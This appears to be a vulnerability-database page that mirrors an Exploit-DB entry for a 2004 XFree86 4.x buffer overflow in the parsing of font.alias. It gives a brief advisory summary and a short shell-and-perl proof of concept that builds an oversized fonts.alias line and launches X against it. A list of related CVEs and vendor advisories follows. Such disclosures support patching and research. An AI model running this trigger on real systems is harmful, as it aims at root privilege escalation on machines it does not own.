Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbGreg MacManusEDB-ID:23690
HistoryFeb 12, 2004 - 12:00 a.m.

XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow

2004-02-1200:00:00
Greg MacManus
www.exploit-db.com
20

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9652/info

It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system.

# cat > fonts.dir <<EOF 
1
word.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
EOF
# perl -e 'print "data " . "0" x 2048 . "A" x 96 . "\n"' > fonts.alias
# X :0 -fp $PWD

Related

cert 1
openvas 10
nessus 10
cve 3
ubuntucve 3
securityvulns 2
cvelist 3
freebsd 2
redhat 2
slackware 1
nvd 3
suse 1
osv 1
debian 1
cert
cert
XFree86 vulnerable to buffer overflow via error in 'ReadFontAlias()' function
2004-12-07 00:00:00
openvas
openvas
Slackware Advisory SSA:2004-043-02 XFree86 security update
2012-09-11 00:00:00
Slackware: Security Advisory (SSA:2004-043-02)
2012-09-10 00:00:00
FreeBSD Ports: XFree86-Server
2008-09-04 00:00:00
nessus
nessus
RHEL 2.1 : XFree86 (RHSA-2004:060)
2004-07-06 00:00:00
Mandrake Linux Security Advisory : XFree86 (MDKSA-2004:012)
2004-07-31 00:00:00
Slackware 8.1 / 9.0 / 9.1 / current : XFree86 security update (SSA:2004-043-02)
2005-07-13 00:00:00
cve
cve
CVE-2004-0106
2004-03-03 05:00:00
CVE-2004-0084
2004-03-03 05:00:00
CVE-2004-0083
2004-03-03 05:00:00
ubuntucve
ubuntucve
CVE-2004-0084
2004-03-03 00:00:00
CVE-2004-0106
2004-03-03 00:00:00
CVE-2004-0083
2004-03-03 00:00:00
securityvulns
securityvulns
OpenServer 5.0.6 OpenServer 5.0.7 : Xsco contains a buffer overflow that could be exploited to gain root privileges.
2004-08-02 00:00:00
UnixWare 7.1.3 Open UNIX 8.0.0 : Xsco contains a buffer overflow that could be exploited to gain root privileges.
2004-08-02 00:00:00
cvelist
cvelist
CVE-2004-0083
2004-02-14 05:00:00
CVE-2004-0084
2004-02-14 05:00:00
CVE-2004-0106
2004-02-16 05:00:00
freebsd
freebsd
Buffer overflows in XFree86 servers
2004-02-10 00:00:00
linux_base -- vulnerabilities in Red Hat 7.1 libraries
2004-09-27 00:00:00
redhat
redhat
(RHSA-2004:060) XFree86 security update
2004-02-13 00:00:00
(RHSA-2004:061) XFree86 security update
2004-02-16 00:00:00
slackware
slackware
XFree86 security update
2004-02-12 12:19:25
nvd
nvd
CVE-2004-0106
2004-03-03 05:00:00
CVE-2004-0084
2004-03-03 05:00:00
CVE-2004-0083
2004-03-03 05:00:00
suse
suse
local privilege escalation in xf86/XFree86
2004-02-23 16:37:48
osv
osv
xfree86 - several vulnerabilities
2004-02-19 00:00:00
debian
debian
[SECURITY] [DSA 443-1] New xfree86 packages fix multiple vulnerabilities
2004-02-20 06:58:37

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23690
cert1openvas10nessus10cve3ubuntucve3securityvulns2cvelist3freebsd2redhat2slackware1nvd3suse1osv1debian1